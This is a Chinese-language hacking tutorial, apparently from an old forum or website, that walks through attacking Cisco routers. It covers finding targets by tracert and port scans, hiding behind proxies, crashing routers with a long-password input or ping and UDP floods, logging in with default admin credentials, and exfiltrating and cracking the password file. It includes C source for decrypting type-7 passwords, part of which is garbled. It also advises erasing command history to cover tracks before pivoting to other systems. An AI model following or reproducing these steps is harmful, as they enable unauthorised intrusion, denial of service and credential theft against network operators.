阅读提示： 第一段：为什么攻击cisco路由器？

你可能会想.. 为什么要攻击 cisco 路由器呢?

答案就是那样做将对闯入其它的系统非常有用...

Cisco路由器非常的快，在一个系统中，一些会是以18 T1连接。而且它们非常灵活，尽管大多数运行
telnet，但是它们可以在DoS攻击或攻入其它系统时发挥作用。

它们同时还会有成千的数据包通过。但是可以被捕获进行译码...许多的cisco路由器受托于系统，它们
可以让你获得其网络中访问其它电脑的确切的数量。
-----------------------------------------------------------------------------------------------
第二段：怎样找到一个cisco路由器？

寻找一个cisco路由器可以说是以项简单的任务，几乎所有的ISP至少通过一个cisco路由器。最简单的
方法是在dos下运行tracert，你可以跟踪到电脑之间的许多电脑，在这之间，必有一个 “cisco”这个
名字。如果你发现了，记下它的IP地址。
:在中国未必有cisco这个名字，但是肯定有路由器的，你可以用SuperScan扫描前两个IP地址，
看哪个开2001端口（Cisco路由器管理）和23端口即是的啦！


现在，你有cisco路由器的位置了，但是它可能还有一个防火墙保护它，所以你要检查一下它是否被封
锁ping连接的次数，如果有回应，它就有可能未被封锁。另外一种方法就是试着访问cisco路由器的一些
端口。你用telnet即可，端口23，如果它要输入密码，未叫输入用
户名，你就可能在一个防火墙。

试着找一个未受防火墙保护的路由器，因为这篇教程主题是路由器，不是教你怎样通过防火墙。当你确
信找到一个好的系统，你应该找一个可以使用23端口的代理服务器，这样你的IP地址就不会被路由器记
录下来了。:找到一台运行Wingate的机器即可。

-----------------------------------------------------------------------------------------------

第三段：怎样闯入一个cisco路由器？

Cisco路由器运行 V4.1 版本的软件（现在普遍使用的），这很容易干掉。你只要通过代理服务器连接到
一个cisco路由器，输入一串很长的密码，如：

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk


现在开始等，cisco系统将会重新启动，可以说你已经攻击它，使它离线了...但是过2-10分钟，它就会
恢复，我们应该进入它。

如果什么都没发生,那么它运行的不是脆弱的软件,你可以多试几种DoS攻击，比如大量的 ping.到dos下，
输入 "ping -l 56550 cisco.router.ip -t",这会起到同样的效果.
:很有可能以上两种方法都不行，反正是要其down机，那么试试那个攻击yahoo的udpFlood，一定
可以使其down机。一定要注意小心啊！我相信你应该知道该怎么保护自己。

如果它被动结,就另找一个代理服务器进行连接。并且用户名为"admin"，密码为"admin"，因为这是默认的。
因为当它暂时的disabled，它将恢复到默认状态。
:你到我主页，会有一篇文章包括几乎所有的路由器的默认用户名和密码。

现在，你已经进入了，你应该获得密码文件！系统运行不同的软件，但大部分有个像"htl-textil"
这类的提示，现在输入"?"，观看命。你会看到有很多的命令，你会发现一个传送命令，用这个命令，在当前Admin用户的情况下，把密码文件发送到你的电脑23端口上。但是在这之前，你要把你的超级终端设定好。你发送文件之后，超级终端将问你是否接收文件，你选择是并保存在电脑中即可。离线. 你通过了最难的部分，下面准备开始破解密码。
-----------------------------------------------------------------------------------------------
第四段：怎样破解密码？

现在，你获得了密码文件，你要破解它才能继续进入路由器。所以你可以运行John the Ripper之类的软件破译它。

这是我推荐的最简单的方法.另一种方法是试着把它解码。这样做需要一个解码软件，使用某些解码软件，你还要有足够的耐心。

这儿有一个专门为cisco路由器密码文件解码的软件，你可以在Linux中编译它:

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - ?') * 10 + enc_pw[1] - ?'

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - ?'
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}

如果你没有使用Linux，你就只好用John the Ripper之类的软件，带上密码档，进行暴利破解。

-----------------------------------------------------------------------------------------------

第五段：怎样使用一个cisco路由器？


要使用它，你先必须连接到它，你可以用代理，以免你的IP地址被记下。当你进入的时候，如果你想关闭
历史记录来掩盖你的行为，你只要输入"terminal history size 0"。这样就不会被记下什么了! 输入 "?"
来看路由器中的命令，大多数你都可以用的。


这些路由器一般都有telnet，所以你可以通过telnet连接到其它的系统上(比如unix boxes)，并且攻击
它们。你还可以使用ping 和 traceroute 进行跟踪系统或进行DoS攻击。你也可以监听数据包，但我不推荐
这样做，因为并不是一定成功，而且会被发现....

-----------------------------------------------------------------------------------------------

如果你第一次没有攻入cisco，不要担心...你一两次是不可能成功的。它需要不断的练习和超强的耐力。
这儿只向你将怎样做...一定要在合法的情况下进行啊！

您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力